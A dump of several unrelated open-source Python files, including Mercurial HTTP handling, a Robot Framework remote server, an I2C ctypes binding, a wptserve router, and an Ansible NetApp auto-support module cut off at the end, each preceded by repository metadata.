class IRegex(Regex):
lookup_name = 'iregex'
default_lookups['iregex'] = IRegex
|
bsd-3-clause
|
apixandru/intellij-community
|
plugins/hg4idea/testData/bin/mercurial/url.py
|
91
|
17489
|
# url.py - HTTP handling for mercurial
#
# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com>
# Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
import urllib, urllib2, httplib, os, socket, cStringIO
from i18n import _
import keepalive, util, sslutil
import httpconnection as httpconnectionmod
class passwordmgr(urllib2.HTTPPasswordMgrWithDefaultRealm):
def __init__(self, ui):
urllib2.HTTPPasswordMgrWithDefaultRealm.__init__(self)
self.ui = ui
def find_user_password(self, realm, authuri):
authinfo = urllib2.HTTPPasswordMgrWithDefaultRealm.find_user_password(
self, realm, authuri)
user, passwd = authinfo
if user and passwd:
self._writedebug(user, passwd)
return (user, passwd)
if not user or not passwd:
res = httpconnectionmod.readauthforuri(self.ui, authuri, user)
if res:
group, auth = res
user, passwd = auth.get('username'), auth.get('password')
self.ui.debug("using auth.%s.* for authentication\n" % group)
if not user or not passwd:
if not self.ui.interactive():
raise util.Abort(_('http authorization required'))
self.ui.write(_("http authorization required\n"))
self.ui.write(_("realm: %s\n") % realm)
if user:
self.ui.write(_("user: %s\n") % user)
else:
user = self.ui.prompt(_("user:"), default=None)
if not passwd:
passwd = self.ui.getpass()
self.add_password(realm, authuri, user, passwd)
self._writedebug(user, passwd)
return (user, passwd)
def _writedebug(self, user, passwd):
msg = _('http auth: user %s, password %s\n')
self.ui.debug(msg % (user, passwd and '*' * len(passwd) or 'not set'))
def find_stored_password(self, authuri):
return urllib2.HTTPPasswordMgrWithDefaultRealm.find_user_password(
self, None, authuri)
class proxyhandler(urllib2.ProxyHandler):
def __init__(self, ui):
proxyurl = ui.config("http_proxy", "host") or os.getenv('http_proxy')
# XXX proxyauthinfo = None
if proxyurl:
# proxy can be proper url or host[:port]
if not (proxyurl.startswith('http:') or
proxyurl.startswith('https:')):
proxyurl = 'http://' + proxyurl + '/'
proxy = util.url(proxyurl)
if not proxy.user:
proxy.user = ui.config("http_proxy", "user")
proxy.passwd = ui.config("http_proxy", "passwd")
# see if we should use a proxy for this url
no_list = ["localhost", "127.0.0.1"]
no_list.extend([p.lower() for
p in ui.configlist("http_proxy", "no")])
no_list.extend([p.strip().lower() for
p in os.getenv("no_proxy", '').split(',')
if p.strip()])
# "http_proxy.always" config is for running tests on localhost
if ui.configbool("http_proxy", "always"):
self.no_list = []
else:
self.no_list = no_list
proxyurl = str(proxy)
proxies = {'http': proxyurl, 'https': proxyurl}
ui.debug('proxying through http://%s:%s\n' %
(proxy.host, proxy.port))
else:
proxies = {}
# urllib2 takes proxy values from the environment and those
# will take precedence if found. So, if there's a config entry
# defining a proxy, drop the environment ones
if ui.config("http_proxy", "host"):
for env in ["HTTP_PROXY", "http_proxy", "no_proxy"]:
try:
if env in os.environ:
del os.environ[env]
except OSError:
pass
urllib2.ProxyHandler.__init__(self, proxies)
self.ui = ui
def proxy_open(self, req, proxy, type_):
host = req.get_host().split(':')[0]
if host in self.no_list:
return None
# work around a bug in Python < 2.4.2
# (it leaves a "\n" at the end of Proxy-authorization headers)
baseclass = req.__class__
class _request(baseclass):
def add_header(self, key, val):
if key.lower() == 'proxy-authorization':
val = val.strip()
return baseclass.add_header(self, key, val)
req.__class__ = _request
return urllib2.ProxyHandler.proxy_open(self, req, proxy, type_)
def _gen_sendfile(orgsend):
def _sendfile(self, data):
# send a file
if isinstance(data, httpconnectionmod.httpsendfile):
# if auth required, some data sent twice, so rewind here
data.seek(0)
for chunk in util.filechunkiter(data):
orgsend(self, chunk)
else:
orgsend(self, data)
return _sendfile
has_https = util.safehasattr(urllib2, 'HTTPSHandler')
if has_https:
try:
_create_connection = socket.create_connection
except AttributeError:
_GLOBAL_DEFAULT_TIMEOUT = object()
def _create_connection(address, timeout=_GLOBAL_DEFAULT_TIMEOUT,
source_address=None):
# lifted from Python 2.6
msg = "getaddrinfo returns an empty list"
host, port = address
for res in socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket.socket(af, socktype, proto)
if timeout is not _GLOBAL_DEFAULT_TIMEOUT:
sock.settimeout(timeout)
if source_address:
sock.bind(source_address)
sock.connect(sa)
return sock
except socket.error, msg:
if sock is not None:
sock.close()
raise socket.error(msg)
class httpconnection(keepalive.HTTPConnection):
# must be able to send big bundle as stream.
send = _gen_sendfile(keepalive.HTTPConnection.send)
def connect(self):
if has_https and self.realhostport: # use CONNECT proxy
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self.host, self.port))
if _generic_proxytunnel(self):
# we do not support client X.509 certificates
self.sock = sslutil.ssl_wrap_socket(self.sock, None, None)
else:
keepalive.HTTPConnection.connect(self)
def getresponse(self):
proxyres = getattr(self, 'proxyres', None)
if proxyres:
if proxyres.will_close:
self.close()
self.proxyres = None
return proxyres
return keepalive.HTTPConnection.getresponse(self)
# general transaction handler to support different ways to handle
# HTTPS proxying before and after Python 2.6.3.
def _generic_start_transaction(handler, h, req):
tunnel_host = getattr(req, '_tunnel_host', None)
if tunnel_host:
if tunnel_host[:7] not in ['http://', 'https:/']:
tunnel_host = 'https://' + tunnel_host
new_tunnel = True
else:
tunnel_host = req.get_selector()
new_tunnel = False
if new_tunnel or tunnel_host == req.get_full_url(): # has proxy
u = util.url(tunnel_host)
if new_tunnel or u.scheme == 'https': # only use CONNECT for HTTPS
h.realhostport = ':'.join([u.host, (u.port or '443')])
h.headers = req.headers.copy()
h.headers.update(handler.parent.addheaders)
return
h.realhostport = None
h.headers = None
def _generic_proxytunnel(self):
proxyheaders = dict(
[(x, self.headers[x]) for x in self.headers
if x.lower().startswith('proxy-')])
self._set_hostport(self.host, self.port)
self.send('CONNECT %s HTTP/1.0\r\n' % self.realhostport)
for header in proxyheaders.iteritems():
self.send('%s: %s\r\n' % header)
self.send('\r\n')
# majority of the following code is duplicated from
# httplib.HTTPConnection as there are no adequate places to
# override functions to provide the needed functionality
res = self.response_class(self.sock,
strict=self.strict,
method=self._method)
while True:
version, status, reason = res._read_status()
if status != httplib.CONTINUE:
break
while True:
skip = res.fp.readline().strip()
if not skip:
break
res.status = status
res.reason = reason.strip()
if res.status == 200:
while True:
line = res.fp.readline()
if line == '\r\n':
break
return True
if version == 'HTTP/1.0':
res.version = 10
elif version.startswith('HTTP/1.'):
res.version = 11
elif version == 'HTTP/0.9':
res.version = 9
else:
raise httplib.UnknownProtocol(version)
if res.version == 9:
res.length = None
res.chunked = 0
res.will_close = 1
res.msg = httplib.HTTPMessage(cStringIO.StringIO())
return False
res.msg = httplib.HTTPMessage(res.fp)
res.msg.fp = None
# are we using the chunked-style of transfer encoding?
trenc = res.msg.getheader('transfer-encoding')
if trenc and trenc.lower() == "chunked":
res.chunked = 1
res.chunk_left = None
else:
res.chunked = 0
# will the connection close at the end of the response?
res.will_close = res._check_close()
# do we have a Content-Length?
# NOTE: RFC 2616, section 4.4, #3 says we ignore this if
# transfer-encoding is "chunked"
length = res.msg.getheader('content-length')
if length and not res.chunked:
try:
res.length = int(length)
except ValueError:
res.length = None
else:
if res.length < 0: # ignore nonsensical negative lengths
res.length = None
else:
res.length = None
# does the body have a fixed length? (of zero)
if (status == httplib.NO_CONTENT or status == httplib.NOT_MODIFIED or
100 <= status < 200 or # 1xx codes
res._method == 'HEAD'):
res.length = 0
# if the connection remains open, and we aren't using chunked, and
# a content-length was not provided, then assume that the connection
# WILL close.
if (not res.will_close and
not res.chunked and
res.length is None):
res.will_close = 1
self.proxyres = res
return False
class httphandler(keepalive.HTTPHandler):
def http_open(self, req):
return self.do_open(httpconnection, req)
def _start_transaction(self, h, req):
_generic_start_transaction(self, h, req)
return keepalive.HTTPHandler._start_transaction(self, h, req)
if has_https:
class httpsconnection(httplib.HTTPSConnection):
response_class = keepalive.HTTPResponse
# must be able to send big bundle as stream.
send = _gen_sendfile(keepalive.safesend)
getresponse = keepalive.wrapgetresponse(httplib.HTTPSConnection)
def connect(self):
self.sock = _create_connection((self.host, self.port))
host = self.host
if self.realhostport: # use CONNECT proxy
_generic_proxytunnel(self)
host = self.realhostport.rsplit(':', 1)[0]
self.sock = sslutil.ssl_wrap_socket(
self.sock, self.key_file, self.cert_file,
**sslutil.sslkwargs(self.ui, host))
sslutil.validator(self.ui, host)(self.sock)
class httpshandler(keepalive.KeepAliveHandler, urllib2.HTTPSHandler):
def __init__(self, ui):
keepalive.KeepAliveHandler.__init__(self)
urllib2.HTTPSHandler.__init__(self)
self.ui = ui
self.pwmgr = passwordmgr(self.ui)
def _start_transaction(self, h, req):
_generic_start_transaction(self, h, req)
return keepalive.KeepAliveHandler._start_transaction(self, h, req)
def https_open(self, req):
# req.get_full_url() does not contain credentials and we may
# need them to match the certificates.
url = req.get_full_url()
user, password = self.pwmgr.find_stored_password(url)
res = httpconnectionmod.readauthforuri(self.ui, url, user)
if res:
group, auth = res
self.auth = auth
self.ui.debug("using auth.%s.* for authentication\n" % group)
else:
self.auth = None
return self.do_open(self._makeconnection, req)
def _makeconnection(self, host, port=None, *args, **kwargs):
keyfile = None
certfile = None
if len(args) >= 1: # key_file
keyfile = args[0]
if len(args) >= 2: # cert_file
certfile = args[1]
args = args[2:]
# if the user has specified different key/cert files in
# hgrc, we prefer these
if self.auth and 'key' in self.auth and 'cert' in self.auth:
keyfile = self.auth['key']
certfile = self.auth['cert']
conn = httpsconnection(host, port, keyfile, certfile, *args,
**kwargs)
conn.ui = self.ui
return conn
class httpdigestauthhandler(urllib2.HTTPDigestAuthHandler):
def __init__(self, *args, **kwargs):
urllib2.HTTPDigestAuthHandler.__init__(self, *args, **kwargs)
self.retried_req = None
def reset_retry_count(self):
# Python 2.6.5 will call this on 401 or 407 errors and thus loop
# forever. We disable reset_retry_count completely and reset in
# http_error_auth_reqed instead.
pass
def http_error_auth_reqed(self, auth_header, host, req, headers):
# Reset the retry counter once for each request.
if req is not self.retried_req:
self.retried_req = req
self.retried = 0
# In python < 2.5 AbstractDigestAuthHandler raises a ValueError if
# it doesn't know about the auth type requested. This can happen if
# somebody is using BasicAuth and types a bad password.
try:
return urllib2.HTTPDigestAuthHandler.http_error_auth_reqed(
self, auth_header, host, req, headers)
except ValueError, inst:
arg = inst.args[0]
if arg.startswith("AbstractDigestAuthHandler doesn't know "):
return
raise
class httpbasicauthhandler(urllib2.HTTPBasicAuthHandler):
def __init__(self, *args, **kwargs):
urllib2.HTTPBasicAuthHandler.__init__(self, *args, **kwargs)
self.retried_req = None
def reset_retry_count(self):
# Python 2.6.5 will call this on 401 or 407 errors and thus loop
# forever. We disable reset_retry_count completely and reset in
# http_error_auth_reqed instead.
pass
def http_error_auth_reqed(self, auth_header, host, req, headers):
# Reset the retry counter once for each request.
if req is not self.retried_req:
self.retried_req = req
self.retried = 0
return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed(
self, auth_header, host, req, headers)
handlerfuncs = []
def opener(ui, authinfo=None):
'''
construct an opener suitable for urllib2
authinfo will be added to the password manager
'''
if ui.configbool('ui', 'usehttp2', False):
handlers = [httpconnectionmod.http2handler(ui, passwordmgr(ui))]
else:
handlers = [httphandler()]
if has_https:
handlers.append(httpshandler(ui))
handlers.append(proxyhandler(ui))
passmgr = passwordmgr(ui)
if authinfo is not None:
passmgr.add_password(*authinfo)
user, passwd = authinfo[2:4]
ui.debug('http auth: user %s, password %s\n' %
(user, passwd and '*' * len(passwd) or 'not set'))
handlers.extend((httpbasicauthhandler(passmgr),
httpdigestauthhandler(passmgr)))
handlers.extend([h(ui, passmgr) for h in handlerfuncs])
opener = urllib2.build_opener(*handlers)
# 1.0 here is the _protocol_ version
opener.addheaders = [('User-agent', 'mercurial/proto-1.0')]
opener.addheaders.append(('Accept', 'application/mercurial-0.1'))
return opener
def open(ui, url_, data=None):
u = util.url(url_)
if u.scheme:
u.scheme = u.scheme.lower()
url_, authinfo = u.authinfo()
else:
path = util.normpath(os.path.abspath(url_))
url_ = 'file://' + urllib.pathname2url(path)
authinfo = None
return opener(ui, authinfo).open(url_, data)
|
apache-2.0
|
xiaokeng/robotframework
|
atest/testdata/standard_libraries/remote/remoteserver.py
|
22
|
2143
|
import inspect
import sys
from SimpleXMLRPCServer import SimpleXMLRPCServer
class RemoteServer(SimpleXMLRPCServer):
def __init__(self, library, port=8270, port_file=None):
SimpleXMLRPCServer.__init__(self, ('127.0.0.1', int(port)))
self.library = library
self._shutdown = False
self.register_function(self.get_keyword_names)
self.register_function(self.get_keyword_arguments)
self.register_function(self.run_keyword)
announce_port(self.socket, port_file)
self.serve_forever()
def serve_forever(self):
while not self._shutdown:
self.handle_request()
def get_keyword_names(self):
return [attr for attr in dir(self.library) if attr[0] != '_']
def get_keyword_arguments(self, name):
kw = getattr(self.library, name)
args, varargs, kwargs, defaults = inspect.getargspec(kw)
args = args[1:] # drop 'self'
if defaults:
args, names = args[:-len(defaults)], args[-len(defaults):]
args += ['%s=%s' % (n, d) for n, d in zip(names, defaults)]
if varargs:
args.append('*%s' % varargs)
if kwargs:
args.append('**%s' % kwargs)
return args
def run_keyword(self, name, args, kwargs=None):
try:
result = getattr(self.library, name)(*args, **(kwargs or {}))
except AssertionError as err:
return {'status': 'FAIL', 'error': str(err)}
else:
return {'status': 'PASS',
'return': result if result is not None else ''}
class DirectResultRemoteServer(RemoteServer):
def run_keyword(self, name, args, kwargs=None):
try:
return getattr(self.library, name)(*args, **(kwargs or {}))
except SystemExit:
self._shutdown = True
return {'status': 'PASS'}
def announce_port(socket, port_file=None):
port = socket.getsockname()[1]
sys.stdout.write('Remote server starting on port %s.\n' % port)
sys.stdout.flush()
if port_file:
with open(port_file, 'w') as f:
f.write(str(port))
|
apache-2.0
|
omegix/ML256-Door-Auth
|
lib/quick2wire/i2c_ctypes.py
|
3
|
1763
|
# Warning: not part of the published Quick2Wire API.
#
# Converted from i2c.h and i2c-dev.h
# I2C only, no SMB definitions
from ctypes import c_int, c_uint16, c_ushort, c_short, c_ubyte, c_char, POINTER, Structure
# /usr/include/linux/i2c-dev.h: 38
class i2c_msg(Structure):
"""<linux/i2c-dev.h> struct i2c_msg"""
_fields_ = [
('addr', c_uint16),
('flags', c_ushort),
('len', c_short),
('buf', POINTER(c_char))]
__slots__ = [name for name,type in _fields_]
# i2c_msg flags
I2C_M_TEN = 0x0010 # this is a ten bit chip address
I2C_M_RD = 0x0001 # read data, from slave to master
I2C_M_NOSTART = 0x4000 # if I2C_FUNC_PROTOCOL_MANGLING
I2C_M_REV_DIR_ADDR = 0x2000 # if I2C_FUNC_PROTOCOL_MANGLING
I2C_M_IGNORE_NAK = 0x1000 # if I2C_FUNC_PROTOCOL_MANGLING
I2C_M_NO_RD_ACK = 0x0800 # if I2C_FUNC_PROTOCOL_MANGLING
I2C_M_RECV_LEN = 0x0400 # length will be first received byte
# /usr/include/linux/i2c-dev.h: 155
class i2c_rdwr_ioctl_data(Structure):
"""<linux/i2c-dev.h> struct i2c_rdwr_ioctl_data"""
_fields_ = [
('msgs', POINTER(i2c_msg)),
('nmsgs', c_int)]
__slots__ = [name for name,type in _fields_]
I2C_FUNC_I2C = 0x00000001
I2C_FUNC_10BIT_ADDR = 0x00000002
I2C_FUNC_PROTOCOL_MANGLING = 0x00000004 # I2C_M_NOSTART etc.
# ioctls
I2C_SLAVE = 0x0703 # Change slave address
# Attn.: Slave address is 7 or 10 bits
I2C_SLAVE_FORCE = 0x0706 # Change slave address
# Attn.: Slave address is 7 or 10 bits
# This changes the address, even if it
# is already taken!
I2C_TENBIT = 0x0704 # 0 for 7 bit addrs, != 0 for 10 bit
I2C_FUNCS = 0x0705 # Get the adapter functionality
I2C_RDWR = 0x0707 # Combined R/W transfer (one stop only)
|
gpl-2.0
|
int19h/PTVS
|
Python/Product/Miniconda/Miniconda3-x64/Tools/scripts/byext.py
|
15
|
3904
|
#! /usr/bin/env python3
"""Show file statistics by extension."""
import os
import sys
class Stats:
def __init__(self):
self.stats = {}
def statargs(self, args):
for arg in args:
if os.path.isdir(arg):
self.statdir(arg)
elif os.path.isfile(arg):
self.statfile(arg)
else:
sys.stderr.write("Can't find %s\n" % arg)
self.addstats("<???>", "unknown", 1)
def statdir(self, dir):
self.addstats("<dir>", "dirs", 1)
try:
names = os.listdir(dir)
except OSError as err:
sys.stderr.write("Can't list %s: %s\n" % (dir, err))
self.addstats("<dir>", "unlistable", 1)
return
for name in sorted(names):
if name.startswith(".#"):
continue # Skip CVS temp files
if name.endswith("~"):
continue # Skip Emacs backup files
full = os.path.join(dir, name)
if os.path.islink(full):
self.addstats("<lnk>", "links", 1)
elif os.path.isdir(full):
self.statdir(full)
else:
self.statfile(full)
def statfile(self, filename):
head, ext = os.path.splitext(filename)
head, base = os.path.split(filename)
if ext == base:
ext = "" # E.g. .cvsignore is deemed not to have an extension
ext = os.path.normcase(ext)
if not ext:
ext = "<none>"
self.addstats(ext, "files", 1)
try:
with open(filename, "rb") as f:
data = f.read()
except IOError as err:
sys.stderr.write("Can't open %s: %s\n" % (filename, err))
self.addstats(ext, "unopenable", 1)
return
self.addstats(ext, "bytes", len(data))
if b'\0' in data:
self.addstats(ext, "binary", 1)
return
if not data:
self.addstats(ext, "empty", 1)
# self.addstats(ext, "chars", len(data))
lines = str(data, "latin-1").splitlines()
self.addstats(ext, "lines", len(lines))
del lines
words = data.split()
self.addstats(ext, "words", len(words))
def addstats(self, ext, key, n):
d = self.stats.setdefault(ext, {})
d[key] = d.get(key, 0) + n
def report(self):
exts = sorted(self.stats)
# Get the column keys
columns = {}
for ext in exts:
columns.update(self.stats[ext])
cols = sorted(columns)
colwidth = {}
colwidth["ext"] = max(map(len, exts))
minwidth = 6
self.stats["TOTAL"] = {}
for col in cols:
total = 0
cw = max(minwidth, len(col))
for ext in exts:
value = self.stats[ext].get(col)
if value is None:
w = 0
else:
w = len("%d" % value)
total += value
cw = max(cw, w)
cw = max(cw, len(str(total)))
colwidth[col] = cw
self.stats["TOTAL"][col] = total
exts.append("TOTAL")
for ext in exts:
self.stats[ext]["ext"] = ext
cols.insert(0, "ext")
def printheader():
for col in cols:
print("%*s" % (colwidth[col], col), end=' ')
print()
printheader()
for ext in exts:
for col in cols:
value = self.stats[ext].get(col, "")
print("%*s" % (colwidth[col], value), end=' ')
print()
printheader() # Another header at the bottom
def main():
args = sys.argv[1:]
if not args:
args = [os.curdir]
s = Stats()
s.statargs(args)
s.report()
if __name__ == "__main__":
main()
|
apache-2.0
|
timopulkkinen/BubbleFish
|
tools/json_schema_compiler/json_schema_test.py
|
8
|
1595
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json_schema
import json_schema_test
import unittest
class JsonSchemaUnittest(unittest.TestCase):
def testNocompile(self):
compiled = [
{
"namespace": "compile",
"functions": [],
"types": {}
},
{
"namespace": "functions",
"functions": [
{
"id": "two"
},
{
"id": "four"
}
],
"types": {
"one": { "key": "value" }
}
},
{
"namespace": "types",
"functions": [
{ "id": "one" }
],
"types": {
"two": {
"key": "value"
},
"four": {
"key": "value"
}
}
},
{
"namespace": "nested",
"properties": {
"sync": {
"functions": [
{
"id": "two"
},
{
"id": "four"
}
],
"types": {
"two": {
"key": "value"
},
"four": {
"key": "value"
}
}
}
}
}
]
schema = json_schema.CachedLoad('test/json_schema_test.json')
self.assertEquals(compiled, json_schema.DeleteNodes(schema, 'nocompile'))
if __name__ == '__main__':
unittest.main()
|
bsd-3-clause
|
ypwalter/fxos-certsuite
|
mcts/web-platform-tests/tests/tools/wptserve/wptserve/router.py
|
10
|
5745
|
import itertools
import logging
import re
import types
logger = logging.getLogger("wptserve")
logger.setLevel(logging.DEBUG)
any_method = object()
class RouteTokenizer(object):
def literal(self, scanner, token):
return ("literal", token)
def slash(self, scanner, token):
return ("slash", None)
def group(self, scanner, token):
return ("group", token[1:-1])
def star(self, scanner, token):
return ("star", token[1:-3])
def scan(self, input_str):
scanner = re.Scanner([(r"/", self.slash),
(r"{\w*}", self.group),
(r"\*", self.star),
(r"(?:\\.|[^{\*/])*", self.literal),])
return scanner.scan(input_str)
class RouteCompiler(object):
def __init__(self):
self.reset()
def reset(self):
self.star_seen = False
def compile(self, tokens):
self.reset()
func_map = {"slash":self.process_slash,
"literal":self.process_literal,
"group":self.process_group,
"star":self.process_star}
re_parts = ["^"]
if not tokens or tokens[0][0] != "slash":
tokens = itertools.chain([("slash", None)], tokens)
for token in tokens:
re_parts.append(func_map[token[0]](token))
re_parts.append("$")
return re.compile("".join(re_parts))
def process_literal(self, token):
return re.escape(token[1])
def process_slash(self, token):
return "/"
def process_group(self, token):
if self.star_seen:
raise ValueError("Group seen after star in regexp")
return "(?P<%s>[^/]+)" % token[1]
def process_star(self, token):
if self.star_seen:
raise ValueError("Star seen after star in regexp")
self.star_seen = True
return "(.*)"
def compile_path_match(route_pattern):
"""tokens: / or literal or match or *"""
tokenizer = RouteTokenizer()
tokens, unmatched = tokenizer.scan(route_pattern)
assert unmatched is "", unmatched
compiler = RouteCompiler()
return compiler.compile(tokens)
class Router(object):
"""Object for matching handler functions to requests.
:param doc_root: Absolute path of the filesystem location from
which to serve tests
:param routes: Initial routes to add; a list of three item tuples
(method, path_pattern, handler_function), defined
as for register()
"""
def __init__(self, doc_root, routes):
self.doc_root = doc_root
self.routes = []
for route in reversed(routes):
self.register(*route)
def register(self, methods, path, handler):
"""Register a handler for a set of paths.
:param methods: Set of methods this should match. "*" is a
special value indicating that all methods should
be matched.
:param path_pattern: Match pattern that will be used to determine if
a request path matches this route. Match patterns
consist of either literal text, match groups,
denoted {name}, which match any character except /,
and, at most one \*, which matches any character.
If there is no leading "/" on the pattern, this is
automatically implied. For example::
api/{resource}/*.json
Would match `/api/test/data.json` or
`/api/test/test2/data.json`, but not `/api/test/data.py`.
The match groups, and anything matching the * are made
available in the request object as a dictionary through
the route_match property. For example, given the route
pattern above and the path `/api/test/data.json`, the
route_match property would contain::
{"resource": "test", "*": "data"}
:param handler: Function that will be called to process matching
requests. This must take two parameters, the request
object and the response object.
"""
if type(methods) in types.StringTypes or methods is any_method:
methods = [methods]
for method in methods:
self.routes.append((method, compile_path_match(path), handler))
print self.routes[-1][1].pattern
def get_handler(self, request):
"""Get a handler for a request or None if there is no handler.
:param request: Request to get a handler for.
:rtype: Callable or None
"""
for method, regexp, handler in reversed(self.routes):
if (request.method == method or
method is any_method or
(request.method == "HEAD" and method == "GET")):
m = regexp.match(request.url_parts.path)
if m:
if not hasattr(handler, "__class__"):
name = handler.__name__
else:
name = handler.__class__.__name__
logger.debug("Found handler %s" % name)
match_parts = m.groupdict().copy()
if len(match_parts) < len(m.groups()):
match_parts["*"] = m.groups()[-1]
request.route_match = match_parts
return handler
return None
|
mpl-2.0
|
maxalbert/bokeh
|
bokeh/compat/mplexporter/renderers/vincent_renderer.py
|
64
|
1922
|
import warnings
from .base import Renderer
from ..exporter import Exporter
class VincentRenderer(Renderer):
def open_figure(self, fig, props):
self.chart = None
self.figwidth = int(props['figwidth'] * props['dpi'])
self.figheight = int(props['figheight'] * props['dpi'])
def draw_line(self, data, coordinates, style, label, mplobj=None):
import vincent # only import if VincentRenderer is used
if coordinates != 'data':
warnings.warn("Only data coordinates supported. Skipping this")
linedata = {'x': data[:, 0],
'y': data[:, 1]}
line = vincent.Line(linedata, iter_idx='x',
width=self.figwidth, height=self.figheight)
# TODO: respect the other style settings
line.scales['color'].range = [style['color']]
if self.chart is None:
self.chart = line
else:
warnings.warn("Multiple plot elements not yet supported")
def draw_markers(self, data, coordinates, style, label, mplobj=None):
import vincent # only import if VincentRenderer is used
if coordinates != 'data':
warnings.warn("Only data coordinates supported. Skipping this")
markerdata = {'x': data[:, 0],
'y': data[:, 1]}
markers = vincent.Scatter(markerdata, iter_idx='x',
width=self.figwidth, height=self.figheight)
# TODO: respect the other style settings
markers.scales['color'].range = [style['facecolor']]
if self.chart is None:
self.chart = markers
else:
warnings.warn("Multiple plot elements not yet supported")
def fig_to_vincent(fig):
"""Convert a matplotlib figure to a vincent object"""
renderer = VincentRenderer()
exporter = Exporter(renderer)
exporter.run(fig)
return renderer.chart
|
bsd-3-clause
|
skg-net/ansible
|
lib/ansible/modules/storage/netapp/netapp_e_asup.py
|
4
|
11216
|
#!/usr/bin/python
# (c) 2018, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: netapp_e_asup
short_description: manage E-Series auto-support settings
description:
- Allow the auto-support settings to be configured for an individual E-Series storage-system
version_added: '2.7'
author: Michael Price (@lmprice)
extends_documentation_fragment:
- netapp.eseries
options:
state:
description:
- Enable/disable the E-Series auto-support configuration.
- When this option is enabled, configuration, logs, and other support-related information will be relayed
to NetApp to help better support your system. No personally identifiable information, passwords, etc, will
be collected.
default: enabled
choices:
- enabled
- disabled
aliases:
- asup
- auto_support
- autosupport
active:
description:
- Enable active/proactive monitoring for ASUP. When a problem is detected by our monitoring systems, it's
possible that the bundle did not contain all of the required information at the time of the event.
Enabling this option allows NetApp support personnel to manually request transmission or re-transmission
of support data in order ot resolve the problem.
- Only applicable if I(state=enabled).
default: yes
type: bool
start:
description:
- A start hour may be specified in a range from 0 to 23 hours.
- ASUP bundles will be sent daily between the provided start and end time (UTC).
- I(start) must be less than I(end).
aliases:
- start_time
default: 0
end:
description:
- An end hour may be specified in a range from 1 to 24 hours.
- ASUP bundles will be sent daily between the provided start and end time (UTC).
- I(start) must be less than I(end).
aliases:
- end_time
default: 24
days:
description:
- A list of days of the week that ASUP bundles will be sent. A larger, weekly bundle will be sent on one
of the provided days.
choices:
- monday
- tuesday
- wednesday
- thursday
- friday
- saturday
- sunday
required: no
aliases:
- days_of_week
- schedule_days
verbose:
description:
- Provide the full ASUP configuration in the return.
default: no
required: no
type: bool
log_path:
description:
- A local path to a file to be used for debug logging
required: no
notes:
- Check mode is supported.
- Enabling ASUP will allow our support teams to monitor the logs of the storage-system in order to proactively
respond to issues with the system. It is recommended that all ASUP-related options be enabled, but they may be
disabled if desired.
- This API is currently only supported with the Embedded Web Services API v2.0 and higher.
"""
EXAMPLES = """
- name: Enable ASUP and allow pro-active retrieval of bundles
netapp_e_asup:
state: enabled
active: yes
api_url: "10.1.1.1:8443"
api_username: "admin"
api_password: "myPass"
- name: Set the ASUP schedule to only send bundles from 12 AM CST to 3 AM CST.
netapp_e_asup:
start: 17
end: 20
api_url: "10.1.1.1:8443"
api_username: "admin"
api_password: "myPass"
"""
RETURN = """
msg:
description: Success message
returned: on success
type: string
sample: The settings have been updated.
asup:
description:
- True if ASUP is enabled.
returned: on success
sample: True
type: bool
active:
description:
- True if the active option has been enabled.
returned: on success
sample: True
type: bool
cfg:
description:
- Provide the full ASUP configuration.
returned: on success when I(verbose=true).
type: complex
contains:
asupEnabled:
description:
- True if ASUP has been enabled.
type: bool
onDemandEnabled:
description:
- True if ASUP active monitoring has been enabled.
type: bool
daysOfWeek:
description:
- The days of the week that ASUP bundles will be sent.
type: list
"""
import json
import logging
from pprint import pformat
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.netapp import request, eseries_host_argument_spec
from ansible.module_utils._text import to_native
HEADERS = {
"Content-Type": "application/json",
"Accept": "application/json",
}
class Asup(object):
DAYS_OPTIONS = ['sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday']
def __init__(self):
argument_spec = eseries_host_argument_spec()
argument_spec.update(dict(
state=dict(type='str', required=False, default='enabled', aliases=['asup', 'auto_support', 'autosupport'],
choices=['enabled', 'disabled']),
active=dict(type='bool', required=False, default=True, ),
days=dict(type='list', required=False, aliases=['schedule_days', 'days_of_week'],
choices=self.DAYS_OPTIONS),
start=dict(type='int', required=False, default=0, aliases=['start_time']),
end=dict(type='int', required=False, default=24, aliases=['end_time']),
verbose=dict(type='bool', required=False, default=False),
log_path=dict(type='str', required=False),
))
self.module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True, )
args = self.module.params
self.asup = args['state'] == 'enabled'
self.active = args['active']
self.days = args['days']
self.start = args['start']
self.end = args['end']
self.verbose = args['verbose']
self.ssid = args['ssid']
self.url = args['api_url']
self.creds = dict(url_password=args['api_password'],
validate_certs=args['validate_certs'],
url_username=args['api_username'], )
self.check_mode = self.module.check_mode
log_path = args['log_path']
# logging setup
self._logger = logging.getLogger(self.__class__.__name__)
if log_path:
logging.basicConfig(
level=logging.DEBUG, filename=log_path, filemode='w',
format='%(relativeCreated)dms %(levelname)s %(module)s.%(funcName)s:%(lineno)d\n %(message)s')
if not self.url.endswith('/'):
self.url += '/'
if self.start >= self.end:
self.module.fail_json(msg="The value provided for the start time is invalid."
" It must be less than the end time.")
if self.start < 0 or self.start > 23:
self.module.fail_json(msg="The value provided for the start time is invalid. It must be between 0 and 23.")
else:
self.start = self.start * 60
if self.end < 1 or self.end > 24:
self.module.fail_json(msg="The value provided for the end time is invalid. It must be between 1 and 24.")
else:
self.end = min(self.end * 60, 1439)
if not self.days:
self.days = self.DAYS_OPTIONS
def get_configuration(self):
try:
(rc, result) = request(self.url + 'device-asup', headers=HEADERS, **self.creds)
if not (result['asupCapable'] and result['onDemandCapable']):
self.module.fail_json(msg="ASUP is not supported on this device. Array Id [%s]." % (self.ssid))
